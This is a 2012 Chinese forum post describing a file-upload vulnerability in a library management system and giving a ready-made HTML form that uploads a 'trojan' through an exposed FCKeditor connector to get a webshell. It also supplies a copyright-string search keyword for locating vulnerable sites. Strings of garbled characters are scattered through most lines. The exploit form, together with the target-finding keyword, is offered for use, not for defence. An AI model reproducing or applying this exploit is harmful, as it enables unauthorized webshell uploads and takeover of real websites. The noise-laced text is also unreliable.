主题:图书馆系统任意文件上传漏洞& E8 Z6 e( [& K ~) B! @8 p3 n' v
作者:冰锋刺客
" s" B! n" s" b% a! g Y5 d+ x 厂商:点击书(dianjishu.com)
% u5 @' X% J( Q# e& }4 G$ F: ^ 日期:2012-6-213 i; u7 M L" S" r
* ~1 g/ w" T" M/ N4 p
I 概述
8 {2 E2 k, {; z+ u/ i 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell9 q( t& a" S8 U) a1 k$ }( t+ S
II 简介
; T1 y7 j% j8 f7 N 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved": R+ `( T0 p: P1 p/ Y9 f5 b
补充一个漏洞
3 G( x: a8 U p <form id="frmUpload" enctype="multipart/form-data"4 S0 h8 [' k/ N ~
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
2 l; F! l' B( o1 t$ ^* D <input id="btnUpload" type="submit" value="操翻他">
3 a: S$ e' p, s2 W* L, H6 C </form>
' N% x3 R" h4 ` 你们懂的
# D* p. A5 M" m: o9 B 那傻逼提供还需要改包.
) p- B: F0 Y! A, l' b 自己看了下源代码发现fckeditor8 v7 w& k5 ~$ _; [" ^/ a% c a
直接秒杀
& g' P6 ^& e2 {# z4 V4 } |
发表于 2012-9-10 21:20:59
收藏
支持
反对